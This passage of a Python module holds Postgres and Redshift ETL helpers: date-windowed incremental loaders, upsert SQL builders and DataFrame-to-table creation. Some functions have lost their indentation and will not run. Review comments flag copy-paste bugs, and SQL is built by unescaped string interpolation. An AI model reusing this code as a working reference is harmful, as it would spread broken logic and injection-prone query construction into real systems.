filter_day_id_field2=False,
filter_id_type2=False,
sql_loop_fn_dt_placeholder2=False,
filter_day_id_field3=False,
filter_id_type3=False,
sql_loop_fn_dt_placeholder3=False,
loop_src1=False,
loop_src2=False,
loop_src3=False,
log_dir=False):
"""
:param override:
:param tgt_tbl:
:param conn:
:param dt_start:
:param dt_end:
:param saved_day_id_range_placeholder:
:param dt1_interval:
:param dt2_interval:
:param sql_loop_fn:
:param sql_loop_fn_type:
:param filter_day_id_field1:
:param sql_loop_fn_dt_placeholder1:
:param filter_day_id_field2:
:param filter_id_type2:
:param sql_loop_fn_dt_placeholder2:
:param filter_day_id_field3:
:param filter_id_type3:
:param sql_loop_fn_dt_placeholder3:
:param loop_src1:
:param loop_src2:
:param loop_src3:
:param log_dir:
:return:
"""
# define the month startend dates to loop through
rptg_dates = pd.date_range(dt_start, dt_end, freq=dt1_interval) - pd.offsets.MonthBegin(1)
rptg_dates = [str(x)[:10] for x in rptg_dates.to_list()]
rptg_dates = pd.DataFrame({
"start_date": rptg_dates,
"end_date": rptg_dates
})
rptg_dates['end_date'] = rptg_dates['end_date'].shift(-1)
rptg_dates = rptg_dates[pd.to_datetime(rptg_dates['start_date']) <= datetime.now()].dropna()
# define the weekly start/end dates to loop thru
rptg_dates_wk = pd.date_range(dt_start, dt_end, freq=dt2_interval)
rptg_dates_wk = [str(x)[:10] for x in rptg_dates_wk.to_list()]
rptg_dates_wk = pd.DataFrame({
"start_date": rptg_dates_wk,
"end_date": rptg_dates_wk
})
rptg_dates_wk['end_date'] = rptg_dates_wk['end_date'].shift(-1)
rptg_dates_wk = rptg_dates_wk[pd.to_datetime(rptg_dates_wk['start_date']) <= datetime.now()].dropna()
# dropping table if override = True
if override:
print(f'''table override True: Dropping table: {tgt_tbl} ''')
try:
cls.run_query_pg(conn=conn, sql=f'''drop table {tgt_tbl}''')
except:
conn.commit()
pass
# getting max day id value
try:
sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
saved_dates = pd.read_sql_query(sql=sql, con=conn)
except:
conn.commit()
saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]}) # arbitrarily old date
saved_date_dt = \
datetime(
year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
).replace(day=1).strftime("%Y-%m-%d")
rptg_dates = rptg_dates[
pd.to_datetime(rptg_dates['start_date']) >= \
pd.to_datetime(saved_date_dt)].reset_index(drop=True)
print("Starting load from:")
print(rptg_dates.head(1))
rptg_freq = "M"
for idx, row in rptg_dates.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
# if idx == 0:
# break
if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
# bump up start range:
new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
# if its a function, pass in params
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(src=loop_src1,
src2=loop_src2,
src3=loop_src3,
start=new_start,
end=row['end_date'])
# otherwise, we will just replace strings
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{new_start} to {row['end_date']}' as dt_range,"
)
# date filters
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
elif filter_id_type2 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
if filter_day_id_field3 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
elif filter_id_type3 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
else:
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(
start=row['start_date'],
end=row['end_date'],
src=loop_src1,
src2=loop_src2,
src3=loop_src3
)
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
# date range column for logging
sql = sql.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
elif filter_id_type2 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
elif filter_id_type3 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
try:
cls.run_query_pg(conn=conn, sql=sql_prefix + sql)
except Exception as e:
print(str(e))
rptg_freq = "W"
conn.commit()
break
# if the insert failed on a monthly level, cycle down to weekly level
if rptg_freq == "W":
print("Insert failed on monthly level...cycling down to weekly")
# getting max day id value
try:
sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
saved_dates = pd.read_sql_query(sql=sql, con=conn)
except:
conn.commit()
saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]}) # arbitrarily old date
saved_date_dt = \
datetime(
year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
).replace(day=1).strftime("%Y-%m-%d")
rptg_dates_wk = rptg_dates_wk[
pd.to_datetime(rptg_dates_wk['start_date']) >= \
pd.to_datetime(saved_date_dt)].reset_index(drop=True)
for idx, row in rptg_dates_wk.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
# bump up start range:
new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(src=loop_src1,
src2=loop_src2,
src3=loop_src3,
start=new_start,
end=row['end_date'])
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{new_start} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
else:
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(
start=row['start_date'],
end=row['end_date'],
src=loop_src1,
src2=loop_src2,
src3=loop_src3
)
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
cls.run_query_pg(conn=conn, sql=sql_prefix + sql)
    @classmethod
    def sequential_load_pg_wk(cls,
                              rptg_dates,
                              override,
                              tgt_tbl,
                              conn,
                              rptg_wk,
                              rptg_wk_start,
                              rptg_wk_end,
                              sql_loop_fn,
                              # filter dates set 1
                              filter_dt_field1=False,
                              filter_dt_type1=False,
                              filter_dt_placeholder1=False,
                              # filter dates set 2
                              filter_dt_field2=False,
                              filter_dt_type2=False,
                              filter_dt_placeholder2=False,
                              # filter dates set 3
                              filter_dt_field3=False,
                              filter_dt_type3=False,
                              filter_dt_placeholder3=False,
                              log_dir=False
                              ):
        """
        Loads a Postgres table week-by-week by templating and executing
        sql_loop_fn once per row of rptg_dates, stopping on the first failure.

        :param rptg_dates: DataFrame with 'rptg_wk', 'start_date' and 'end_date' columns, one row per week.
        :param override: When truthy, drop tgt_tbl and CREATE it from the first week; otherwise INSERT only.
        :param tgt_tbl: Target Postgres table name.
        :param conn: Postgres database connection object.
        :param rptg_wk: Placeholder token replaced by the week-identifier column.
        :param rptg_wk_start: Placeholder token replaced by the week start-date column.
        :param rptg_wk_end: Placeholder token replaced by the week end-date column.
        :param sql_loop_fn: SQL template string containing the placeholder tokens.
        :param filter_dt_field1: Date field filtered per week (start < field <= end).
        :param filter_dt_type1: NOTE(review): accepted but never read -- confirm before removing.
        :param filter_dt_placeholder1: Placeholder token replaced by the field1 date filter.
        :param filter_dt_field2: Optional second date field to filter.
        :param filter_dt_type2: "range" or "<=" -- how field2 is filtered.
        :param filter_dt_placeholder2: Placeholder token replaced by the field2 date filter.
        :param filter_dt_field3: Optional third date field to filter.
        :param filter_dt_type3: "range" or "<=" -- how field3 is filtered.
        :param filter_dt_placeholder3: Placeholder token replaced by the field3 date filter.
        :param log_dir: Directory where each generated statement is dumped as "<tbl>_<idx>.sql".
        :return: Nothing; executes one CREATE/INSERT per week.
        """
        # dropping table if override = True
        if override:
            print(f'''table override True: Dropping table: {tgt_tbl} ''')
            try:
                cls.run_query_pg(conn=conn, sql=f'''drop table {tgt_tbl}''')
            except:
                # table may not exist yet -- reset the transaction and continue
                conn.commit()
                pass
        for idx, row in rptg_dates.iterrows():
            print(f'''{row['start_date']} to {row['end_date']}''')
            # date range column for logging
            sql = sql_loop_fn.replace(
                rptg_wk,
                f" '{row['rptg_wk']}' as rptg_wk,"
            )
            sql = sql.replace(
                rptg_wk_start,
                f" '{row['start_date']}' as rptg_wk_start,"
            )
            sql = sql.replace(
                rptg_wk_end,
                f" '{row['end_date']}' as rptg_wk_end,"
            )
            # date filters (field1 always filtered as a start/end range)
            sql = sql.replace(
                filter_dt_placeholder1,
                f" AND date({filter_dt_field1}) > '{row['start_date']}' "
                f" AND date({filter_dt_field1}) <= '{row['end_date']}'"
            )
            # check for other date fields
            if filter_dt_placeholder2:
                if filter_dt_type2 == "range":
                    sql = sql.replace(
                        filter_dt_placeholder2,
                        f" AND date({filter_dt_field2}) > '{row['start_date']}' "
                        f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
                    )
                elif filter_dt_type2 == "<=":
                    sql = sql.replace(
                        filter_dt_placeholder2,
                        f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
                    )
            if filter_dt_placeholder3:
                if filter_dt_type3 == "range":
                    sql = sql.replace(
                        filter_dt_placeholder3,
                        f" AND date({filter_dt_field3}) > '{row['start_date']}' "
                        f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
                    )
                elif filter_dt_type3 == "<=":
                    sql = sql.replace(
                        filter_dt_placeholder3,
                        f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
                    )
            # first week with override creates the table; later weeks append
            if idx == 0 and override:
                sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
            else:
                sql_prefix = f"INSERT INTO {tgt_tbl} "
            # log the statement that is about to run
            Export.dump_sql(obj=sql_prefix + sql,
                            dir=log_dir + f"{tgt_tbl}_{idx}.sql")
            try:
                cls.run_query_pg(conn=conn, sql=sql_prefix + sql)
            except Exception as e:
                # stop at the first failed week after resetting the transaction
                print(str(e))
                conn.commit()
                break
class Redshift:
"""
Generic functions for Redshift SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/redshift1.png
"""
@classmethod
def run_query_rs(cls, conn, sql):
"""
Executes a SQL statement with a Redshift database connection.
:param conn: Redshift database connection object,
:param sql: SQL Statement to execute.
:return: Elapsed time to execute query.
"""
rptg_tstart = datetime.now()
cur = conn.cursor()
cur.execute(sql)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def insert_val_rs(cls, col_list, val_list, tbl_name):
"""
Creates SQL to run an INSERT operation of a given Redshift table.
:param col_list: List of columns to INSERT or UPDATE.
:param val_list: List of values to INSERT or UPDATE.
:param tbl_name: Name of Postgres table.
:return: SQL to run an INSERT statement.
"""
sql = f'''
INSERT INTO {tbl_name}
(
{str(col_list).replace("[", "").replace("]", "").replace("'", "")}
) values (
{str(val_list).replace("[", "").replace("]", "")}
)
'''
return sql
    @classmethod
    def upsert_tbl_rs(cls, src_tbl, tgt_tbl, src_join_cols, src_insert_cols,
                      src_update_cols=False, update_compare_cols=False):
        """
        Creates SQL to run an UPSERT (INSERT new records or UPDATE existing records) operation of a given Redshift table.

        Returns a (sql_update, sql_insert) pair; sql_update is "" when
        src_update_cols is not supplied.

        :param src_tbl: Redshift source table that contains data to be merged from.
        :param tgt_tbl: Redshift target table to receive UPSERT operation.
        :param src_join_cols: Columns to use to join source and target tables.
        :param src_insert_cols: Columns to be inserted from source table.
        :param src_update_cols: Columns to be updated from source table.
        :param update_compare_cols: Columns to use to compare values across source and target tables.
        :return: A SQL Update statement and a SQL Insert statement (in that order).
        """
        # "t.a = s.a AND t.b = s.b" -- join predicate between target (t) and source (s).
        # NOTE(review): built by stringifying a list and stripping [ ] ' , --
        # column names containing any of those characters would be mangled.
        src_join_cols_ = (
            str([f"t.{c} = s.{c} AND "
                 for c in src_join_cols])
            .replace("[", "")
            .replace("]", "")
            .replace("'", "")
            .replace(",", "")
        )
        # drop the trailing "AND "
        src_join_cols_ = src_join_cols_[:src_join_cols_.rfind("AND")]
        # "t.a IS NULL AND ..." -- anti-join filter used to keep only new rows
        src_join_cols_f = (
            str([f"t.{c} IS NULL AND "
                 for c in src_join_cols])
            .replace("[", "")
            .replace("]", "")
            .replace("'", "")
            .replace(",", "")
        )
        src_join_cols_f = src_join_cols_f[:src_join_cols_f.rfind("AND")]
        # "s.a, s.b" -- source-qualified column list for the INSERT's SELECT
        src_insert_cols_ = (
            str([f"s.{c}"
                 for c in src_insert_cols])
            .replace("[", "")
            .replace("]", "")
            .replace("'", "")
        )
        if src_update_cols:
            # "a = s.a, b = s.b" -- SET list for the UPDATE statement
            src_update_cols_ = (
                str([f"{c} = s.{c},"
                     for c in src_update_cols])
                .replace("[", "")
                .replace("]", "")
                .replace("', '", "")
                .replace("'", "")
            )
            src_update_cols_ = src_update_cols_[:src_update_cols_.rfind(",")]
            # update join statement: qualify target columns with the table name
            src_join_cols2_ = src_join_cols_.replace("t.", f"{tgt_tbl}.")
            if update_compare_cols:
                # only update rows whose compared values actually differ
                update_compare_cols_ = (
                    str([f"s.{c} != {tgt_tbl}.{c},"
                         for c in update_compare_cols])
                    .replace("[", "")
                    .replace("]", "")
                    .replace("', '", "")
                    .replace("'", "")
                )
                update_compare_cols_ = update_compare_cols_[:update_compare_cols_.rfind(",")]
                src_join_cols2_ = src_join_cols2_ + " AND " + update_compare_cols_
            # src_join_cols2_ = src_join_cols2_.replace("t.", f"{tgt_tbl}.")
            # https://dwgeek.com/amazon-redshift-merge-statement-alternative-and-example.html/
            sql_update = f'''
            /* Update records*/
            UPDATE {tgt_tbl}
            SET {src_update_cols_}
            FROM {src_tbl} s
            WHERE {src_join_cols2_}
            '''.replace("\n", " ")
        else:
            sql_update = ""
        # insert rows that have no match in the target (left join + IS NULL)
        sql_insert = f'''
        /* Insert records*/
        INSERT INTO {tgt_tbl}
        SELECT {src_insert_cols_}
        FROM {src_tbl} s
        LEFT JOIN {tgt_tbl} t
        ON {src_join_cols_}
        WHERE {src_join_cols_f}
        '''.replace("\n", " ")
        return sql_update, sql_insert
@classmethod
def make_df_tbl_rs(cls, tbl_name, df):
"""
Creates SQL to run a CREATE TABLE statement based on a Pandas DataFrame.
:param tbl_name: Redshift table name.
:param df: Pandas DataFrame.
:return: CREATE TABLE SQL statement.
"""
# fix columns
df = Generic.make_db_cols(df)
# loop thru the columns
for idx, col in enumerate(df):
# find the max length of each field
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
# find the max value of each fields
try:
col_max = col + "-" + str(max(df[col]))
except:
col_max = col + "-" + 'NA'
if idx == 0:
col_desc_all = [col_desc]
col_max_all = [col_max]
else:
col_desc_all.append(col_desc)
col_max_all.append(col_max)
# make df of column lengths
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = \
col_desc_all['char'].str.split('-', 1).str
# make df of column max
col_max_all = pd.DataFrame(col_max_all)
col_max_all.columns = ["char"]
col_max_all['column'], col_max_all['max'] = \
col_max_all['char'].str.split('-', 1).str
# make df of column dtypes
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
# join dfs
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
col_desc_all = pd.merge(
col_desc_all,
col_max_all[["column", "max"]],
how="inner",
on="column")
# define data type mapping (pandas --> teradata)
d = {'object': 'VARCHAR',
'int64': 'INTEGER',
'Int64': 'INTEGER',
'int32': 'INTEGER',
'bool': 'VARCHAR',
'float64': 'FLOAT',
'datetime64[ns]': 'TIMESTAMP',
"datetime64[ns, UTC]": "TIMESTAMP"}
col_desc_all = col_desc_all.astype(str).replace(d)
# list the columns where you want to specify the lengths
col_desc_all['concat'] = np.where(
# if varchar, use the length of the longest char
col_desc_all['type'] == "VARCHAR",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str) + \
"(" + col_desc_all['length'] + ")",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str))
# convert integers with a max val over certain amount to varchar
for idx, row in col_desc_all.iterrows():
if str(row['type']) == 'INTEGER' and row['max'] != "nan" and int(row['max']) > 2147483647:
val = row['concat']
col_desc_all.loc[idx, 'concat'] = \
val.replace(
" INTEGER",
f" VARCHAR({row['length']})")
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def insert_df_rs(cls, cursor, conn, df, tbl_name):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame into a Redshift table..
:param cursor: Redshift database cursor object.
:param conn: Redshift database connection object.
:param df: Pandas DataFrame to insert into a Redshift table.
:param tbl_name: Redshift table name.
:return: Elapsed time to execute query.
"""
df_load = df.replace({pd.np.nan: None})
df_load = df_load.round(3)
df_columns = list(df_load)
# create (col1,col2,...)
columns = ",".join(df_columns)
values = "VALUES({})".format(",".join(["%s" for _ in df_columns]))
insert_stmt = "INSERT INTO {} ({}) {}".format(tbl_name, columns, values)
rptg_tstart = datetime.now()
psycopg2.extras.execute_batch(cursor, insert_stmt, df_load.values)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def make_tbl_complete_rs(cls, df, tbl_name, conn, cursor, batch_size=False):
    """
    Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.

    :param df: Pandas DataFrame to create a table from.
    :param tbl_name: Name of table to be created.
    :param conn: Redshift database connection object.
    :param cursor: Redshift database cursor object.
    :param batch_size: Records to load per batch.
    :return: None. Prints the elapsed insert time in minutes.
    """
    # 1) drop the table (best-effort: it may not exist yet)
    print(f"dropping table: {tbl_name}")
    try:
        cls.run_query_rs(sql=f"drop table {tbl_name}", conn=conn)
    except Exception:
        # narrow except: don't swallow KeyboardInterrupt/SystemExit
        print(f"table doesn't exist: {tbl_name}")
    # 2) create the table from the DataFrame's inferred schema
    print(f"creating table: {tbl_name}")
    sql = cls.make_tbl_rs(df=df, tbl_name=tbl_name)
    print(sql)
    cls.run_query_rs(sql=sql, conn=conn)
    # 3) insert the DataFrame rows and report timing
    print(f"inserting DF values into table: {tbl_name}")
    rptg_tstart = datetime.now()
    cls.insert_rs(df=df, tbl=tbl_name, cursor=cursor, conn=conn, batch_size=batch_size)
    rptg_tend = datetime.now()
    tdelta = rptg_tend - rptg_tstart
    tdelta = tdelta.total_seconds() / 60
    print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def sequential_load_rs(cls,
                       override,
                       tgt_tbl,
                       conn,
                       dt_start,
                       dt_end,
                       saved_day_id_range_placeholder,
                       dt1_interval,
                       dt2_interval,
                       sql_loop_fn,
                       sql_loop_fn_type,
                       filter_day_id_field1=False,
                       sql_loop_fn_dt_placeholder1=False,
                       filter_day_id_field2=False,
                       filter_id_type2=False,
                       sql_loop_fn_dt_placeholder2=False,
                       filter_day_id_field3=False,
                       filter_id_type3=False,
                       sql_loop_fn_dt_placeholder3=False,
                       loop_src1=False,
                       loop_src2=False,
                       loop_src3=False,
                       log_dir=False):
    """
    Incrementally loads a Redshift table by looping over date windows.

    Builds monthly date windows (and weekly windows as a fallback), resumes
    from the last saved ``dt_range`` found in the target table, renders one
    SQL statement per window (either by calling ``sql_loop_fn`` or by
    string-replacing placeholders in it), and runs it as CREATE TABLE AS
    (first window with ``override``) or INSERT INTO. If a monthly insert
    fails, the load restarts at weekly granularity from the resume point.

    :param override: If True, drop ``tgt_tbl`` and rebuild it from scratch.
    :param tgt_tbl: Target Redshift table name.
    :param conn: Redshift database connection object.
    :param dt_start: Overall load window start date.
    :param dt_end: Overall load window end date.
    :param saved_day_id_range_placeholder: Template placeholder replaced by a ``dt_range`` logging column.
    :param dt1_interval: pandas frequency string for the monthly pass.
    :param dt2_interval: pandas frequency string for the weekly fallback pass.
    :param sql_loop_fn: SQL template string, or a callable when ``sql_loop_fn_type == "fn"``.
    :param sql_loop_fn_type: "fn" if ``sql_loop_fn`` is callable; any other value means template string.
    :param filter_day_id_field1: Column used by the first date filter.
    :param sql_loop_fn_dt_placeholder1: Placeholder replaced by the first date filter.
    :param filter_day_id_field2: Column used by the second date filter.
    :param filter_id_type2: "range" or "<" behavior for the second date filter.
    :param sql_loop_fn_dt_placeholder2: Placeholder replaced by the second date filter.
    :param filter_day_id_field3: Column used by the third date filter.
    :param filter_id_type3: "range" or "<" behavior for the third date filter.
    :param sql_loop_fn_dt_placeholder3: Placeholder replaced by the third date filter.
    :param loop_src1: Optional source passed through to ``sql_loop_fn``.
    :param loop_src2: Optional second source passed through to ``sql_loop_fn``.
    :param loop_src3: Optional third source passed through to ``sql_loop_fn``.
    :param log_dir: Directory prefix where each generated SQL statement is dumped.
    :return: None.
    """
    # define the month start/end dates to loop through
    rptg_dates = pd.date_range(dt_start, dt_end, freq=dt1_interval) - pd.offsets.MonthBegin(1)
    rptg_dates = [str(x)[:10] for x in rptg_dates.to_list()]
    rptg_dates = pd.DataFrame({
        "start_date": rptg_dates,
        "end_date": rptg_dates
    })
    # each window ends where the next begins; the final open-ended row is dropped
    rptg_dates['end_date'] = rptg_dates['end_date'].shift(-1)
    rptg_dates = rptg_dates[pd.to_datetime(rptg_dates['start_date']) <= datetime.now()].dropna()
    # define the weekly start/end dates to loop thru (fallback granularity)
    rptg_dates_wk = pd.date_range(dt_start, dt_end, freq=dt2_interval)
    rptg_dates_wk = [str(x)[:10] for x in rptg_dates_wk.to_list()]
    rptg_dates_wk = pd.DataFrame({
        "start_date": rptg_dates_wk,
        "end_date": rptg_dates_wk
    })
    rptg_dates_wk['end_date'] = rptg_dates_wk['end_date'].shift(-1)
    rptg_dates_wk = rptg_dates_wk[pd.to_datetime(rptg_dates_wk['start_date']) <= datetime.now()].dropna()
    # dropping table if override = True
    if override:
        print(f'''table override True: Dropping table: {tgt_tbl} ''')
        try:
            cls.run_query_rs(conn=conn, sql=f'''drop table {tgt_tbl}''')
        except:
            # best-effort drop: commit clears the aborted transaction
            conn.commit()
            pass
    # getting max day id value already saved in the target (the resume point)
    try:
        sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
        saved_dates = pd.read_sql_query(sql=sql, con=conn)
    except:
        conn.commit()
        saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]})  # arbitrarily old date
    # first-of-month of the last saved date, formatted 'YYYY-MM-DD'
    saved_date_dt = \
        datetime(
            year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
            month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
            day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
        ).replace(day=1).strftime("%Y-%m-%d")
    # only keep windows at/after the resume point
    rptg_dates = rptg_dates[
        pd.to_datetime(rptg_dates['start_date']) >= \
        pd.to_datetime(saved_date_dt)].reset_index(drop=True)
    print("Starting load from:")
    print(rptg_dates.head(1))
    rptg_freq = "M"
    for idx, row in rptg_dates.iterrows():
        print(f'''{row['start_date']} to {row['end_date']}''')
        # if idx == 0:
        # break
        # first window may start mid-month if data was partially saved already
        if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
            print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
            # bump up start range: day after the last saved date
            new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
            print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
            # if its a function, pass in params
            if sql_loop_fn_type == "fn":
                sql = sql_loop_fn(src=loop_src1,
                                  src2=loop_src2,
                                  src3=loop_src3,
                                  start=new_start,
                                  end=row['end_date'])
            # otherwise, we will just replace strings
            else:
                # date range column for logging
                sql = sql_loop_fn.replace(
                    saved_day_id_range_placeholder,
                    f" '{new_start} to {row['end_date']}' as dt_range,"
                )
                # date filters
                sql = sql.replace(
                    sql_loop_fn_dt_placeholder1,
                    f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
                )
                # check for other date fields
                if sql_loop_fn_dt_placeholder2:
                    if filter_id_type2 == "range":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder2,
                            f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
                        )
                    elif filter_id_type2 == "<":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder2,
                            f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
                        )
                if sql_loop_fn_dt_placeholder3:
                    # NOTE(review): this compares the *field name* to "range";
                    # every parallel branch tests filter_id_type3 instead --
                    # looks like a copy-paste slip, confirm intent.
                    if filter_day_id_field3 == "range":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder3,
                            f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
                        )
                    elif filter_id_type3 == "<":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder3,
                            f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
                        )
        else:
            if sql_loop_fn_type == "fn":
                sql = sql_loop_fn(
                    start=row['start_date'],
                    end=row['end_date'],
                    src=loop_src1,
                    src2=loop_src2,
                    src3=loop_src3
                )
            else:
                # date range column for logging
                sql = sql_loop_fn.replace(
                    saved_day_id_range_placeholder,
                    f" '{row['start_date']} to {row['end_date']}' as dt_range,"
                )
                # NOTE(review): duplicate of the replace above -- a no-op the
                # second time around; presumably a copy-paste artifact.
